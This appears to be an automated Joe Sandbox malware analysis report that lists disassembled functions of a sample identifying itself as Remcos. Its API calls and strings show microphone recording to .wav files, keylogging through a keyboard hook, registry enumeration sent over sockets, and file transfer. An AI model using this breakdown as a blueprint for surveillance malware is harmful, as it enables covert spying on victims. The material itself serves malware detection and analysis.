Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$TUF
API String ID: 1107811701-3349172182
Opcode ID: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
Instruction ID: 617a1b2d0e5065086e96f59d94891ec28435f07c1b58344aee083ceb08d5b609
Opcode Fuzzy Hash: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
Instruction Fuzzy Hash: B63193319001099BDB15FBA1DC55AFE7B36FF10340F10416EEA26661E0EFB45A8ACF91

Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401AD3

Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54

waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2

Strings

`=G, xrefs: 00401B04
.wav, xrefs: 00401AEC
x=G, xrefs: 00401B8B
%Y-%m-%d %H.%M, xrefs: 00401AC4

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
API String ID: 3809562944-3643129801
Opcode ID: 321a298c870f11a35233f69f037945dfe10a28487d777ab409d6a26d8f805abf
Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
Opcode Fuzzy Hash: 321a298c870f11a35233f69f037945dfe10a28487d777ab409d6a26d8f805abf
Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A

Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
waveInStart.WINMM ref: 00401A81

Strings

x=G, xrefs: 00401A1E
`=G, xrefs: 0040196F
XCG, xrefs: 004019A9

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: XCG$`=G$x=G
API String ID: 1356121797-903574159
Opcode ID: e9e2f59ba6b1848148f75df64ff22c446ab224aa2d5f8c1a19093962c227ea42
Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
Opcode Fuzzy Hash: e9e2f59ba6b1848148f75df64ff22c446ab224aa2d5f8c1a19093962c227ea42
Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C

Function 02471BD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02471BE2
waveInOpen.WINMM(00471AF8,000000FF,00471B00,00401A8E,00000000,00000000,00000024), ref: 02471C78
waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 02471CCD
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 02471CDC
waveInStart.WINMM ref: 02471CE8

Strings

XCG, xrefs: 02471C10
`=G, xrefs: 02471BD6
x=G, xrefs: 02471C85

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: XCG$`=G$x=G
API String ID: 1356121797-903574159
Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
Instruction ID: 1232a9288e29b617d95b9b491284e7386437cd68005abf5cc0b1f0034364a8cc
Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
Instruction Fuzzy Hash: A5219D35A023419BC714DF6EBD1599A7BAAFB84341B00883EE11DD72B0EBB49880CF1C

Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988

Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
lstrcpyn.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0041C9EF
TranslateMessage.USER32(?), ref: 0041C9FB
DispatchMessageA.USER32(?), ref: 0041CA05
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12

Strings

Remcos, xrefs: 0041C9CA

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D

Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe8f4040506b0b7999d5e83f00e4d2d9a11c1d9af178d4266cd54efc59f6383
Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
Opcode Fuzzy Hash: 6fe8f4040506b0b7999d5e83f00e4d2d9a11c1d9af178d4266cd54efc59f6383
Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9

Function 024BB6B7 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
Instruction ID: 4e4bec843e657c8ac872f52bae28458d5a0ee8150e4458d67fbb761fba4c42ee
Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
Instruction Fuzzy Hash: 61C18F74E04249AFDB129FA9C840BEEBBB5EF0E318F04419AE945A7391C7749942CB71

Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
__alloca_probe_16.LIBCMT ref: 00452C91
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
__alloca_probe_16.LIBCMT ref: 00452D3B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
__freea.LIBCMT ref: 00452DAA
__freea.LIBCMT ref: 00452DB6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68

Function 024B533C Relevance: 13.7, APIs: 9, Instructions: 153COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B5457
_free.LIBCMT ref: 024B546A
_free.LIBCMT ref: 024B5478
_free.LIBCMT ref: 024B5483
_free.LIBCMT ref: 024B54C5
_free.LIBCMT ref: 024B54CD
_free.LIBCMT ref: 024B54D5
_free.LIBCMT ref: 024B54DD
_free.LIBCMT ref: 024B54EB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
Instruction ID: 07271ed592afe3470386893d38f4fc0528caf8b45392edf28d0640ee47825a57
Opcode Fuzzy Hash: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
Instruction Fuzzy Hash: FA51AD319042458EDB12DB79C840BEEFBB6FF08304F5811AAE895AB351D776A805CB60

Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

_memcmp.LIBVCRUNTIME ref: 004446A3
_free.LIBCMT ref: 00444714
_free.LIBCMT ref: 0044472D
_free.LIBCMT ref: 0044475F
_free.LIBCMT ref: 00444768
_free.LIBCMT ref: 00444774

Strings

C, xrefs: 00444561

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44

Function 024B4660 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

_memcmp.LIBVCRUNTIME ref: 024B490A
_free.LIBCMT ref: 024B497B
_free.LIBCMT ref: 024B4994
_free.LIBCMT ref: 024B49C6
_free.LIBCMT ref: 024B49CF
_free.LIBCMT ref: 024B49DB

Strings

C, xrefs: 024B47C8

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
Instruction ID: 5e98f786cb8c862d43fc3edb1d33e892c815cac51f3a57aadc4d6ba685a2876f
Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
Instruction Fuzzy Hash: 1CB13675A012299FDB25DF29C894BEEB7B5FF08304F1045AAD849A7351E731AE90CF60

Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

tcp, xrefs: 00413B2B
udp, xrefs: 00413B01

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A

Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004017BC

Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,00473D54,004017C1,00475BF0,00000000,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 0043350C

RtlExitUserThread.KERNEL32(00000000,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004017F4
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902

Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,008E54D8,00475BF0,00473D54,0040179E,00475BF0,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 00433561

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

Strings

>G, xrefs: 0040180B
>G, xrefs: 0040188E
T=G, xrefs: 00401800
p[G, xrefs: 00401786

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: T=G$p[G$>G$>G
API String ID: 2307665288-2461731529
Opcode ID: ae73b7dff922bfccc3a875988e1375b520ce2fa40151d55508f037f64cfa0141
Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
Opcode Fuzzy Hash: ae73b7dff922bfccc3a875988e1375b520ce2fa40151d55508f037f64cfa0141
Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E

Function 024719CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 02471A23

Part of subcall function 024A3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A3740
Part of subcall function 024A3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A3773

RtlExitUserThread.NTDLL(00000000), ref: 02471A5B
waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 02471B69

Part of subcall function 024A3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A378B
Part of subcall function 024A3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A37C8

Part of subcall function 024A3B0C: __onexit.LIBCMT ref: 024A3B12

Strings

p[G, xrefs: 024719ED
T=G, xrefs: 02471A67
>G, xrefs: 02471A72
>G, xrefs: 02471AF5

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: T=G$p[G$>G$>G
API String ID: 2307665288-2461731529
Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
Instruction ID: 49a9e0a111f3f25ab6d3afe87a396bf5728cbd8d1afa851992789aa6c856ea59
Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
Instruction Fuzzy Hash: B44193316042015BC325FB2ADC54EFE73A6FB94310F40452FE96D9A2E0EF70A945CE55

Function 02482EEF Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 02482F28

Part of subcall function 02482C11: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02482C84
Part of subcall function 02482C11: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02482CB3

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 02483098

Strings

TUF, xrefs: 02483079
TUFTUF, xrefs: 02483094
DG, xrefs: 02483066
DG, xrefs: 02482F5F
>G, xrefs: 02482F57

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: TUF$TUFTUF$>G$DG$DG
API String ID: 3114080316-72097156
Opcode ID: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
Instruction ID: 5923df3f0ec6b8e773a5d2de7cd5b3f4b6c9a2ab1378a8c327dd92cafe9ad8be
Opcode Fuzzy Hash: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
Instruction Fuzzy Hash: 0141D4316042405BC329FB26DC60AFF7396EFD0740F40882FE96A67290EF649D498E66

Function 02479D77 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 02479DA6
GetWindowThreadProcessId.USER32(00000000,?), ref: 02479DB2
GetKeyboardLayout.USER32(00000000), ref: 02479DB9
GetKeyState.USER32(00000010), ref: 02479DC3
GetKeyboardState.USER32(?), ref: 02479DCE
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02479E83

Strings

8[G, xrefs: 02479E64

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID: 8[G
API String ID: 3566172867-1691237782
Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
Instruction ID: b57305f9014b6aaa9ffd72b87323b6a85bae3967191a7c3ecbb6bc57f624de89
Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
Instruction Fuzzy Hash: D0317C72104308AFD710DF90DC85FDBBBECEB88711F00083ABA45961A0E7B1E548DBA2

Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18

Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588

Strings

.part, xrefs: 00406C0F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 27d7374f3ee011589528e8338ba15a33609dee09afa5847b805241e6dd154f0e
Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
Opcode Fuzzy Hash: 27d7374f3ee011589528e8338ba15a33609dee09afa5847b805241e6dd154f0e
Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A

Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B16C
Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B173

_wcslen.LIBCMT ref: 0041A8F6

Strings

XCG, xrefs: 0041A89C, 0041A8A1
http\shell\open\command, xrefs: 0041A82D
.exe, xrefs: 0041A848
program files (x86)\, xrefs: 0041A8F0
:@, xrefs: 0041A8C3
program files\, xrefs: 0041A8DC, 0041A8E3, 0041A8F5

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
API String ID: 3286818993-703403762
Opcode ID: 07dc00fce4d3d8875e0c95054ba3f3f30343a492a0347fa6595f05e7e4d0a98d
Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
Opcode Fuzzy Hash: 07dc00fce4d3d8875e0c95054ba3f3f30343a492a0347fa6595f05e7e4d0a98d
Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9

Function 02479C4B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02479C68
SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 02479C76
GetLastError.KERNEL32 ref: 02479C82

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02479CD2
TranslateMessage.USER32(?), ref: 02479CE1
DispatchMessageA.USER32(?), ref: 02479CEC

Strings

Keylogger initialization failure: error , xrefs: 02479C99

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
